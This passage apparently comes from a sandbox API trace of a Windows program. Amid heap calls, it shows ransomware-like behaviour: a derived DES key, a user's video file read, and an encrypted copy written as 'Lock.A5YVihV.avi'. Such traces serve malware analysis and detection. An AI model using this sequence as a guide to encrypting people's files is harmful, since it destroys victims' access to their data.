dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69970 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69760 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0212.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.220] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0212.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.221] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.221] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab608, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.221] CryptDeriveKey (in: hProv=0xa7c770, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0212.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.221] CryptDestroyHash (hHash=0x9e2078) returned 1 [0212.222] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/A5YVihV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\a5yvihv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0212.222] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.222] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.222] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0212.223] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.A5YVihV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\lock.a5yvihv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.226] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.226] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x1d60, lpOverlapped=0x0) returned 1 [0212.227] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.230] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.231] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.231] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.231] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.231] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.231] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.231] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.231] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.231] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.231] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.231] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.231] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.231] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.231] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.231] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.231] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.232] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.232] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.232] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.232] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.232] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab6f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.232] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1d60, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1d68) returned 1 [0212.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0212.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0212.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0212.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0212.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0212.234] 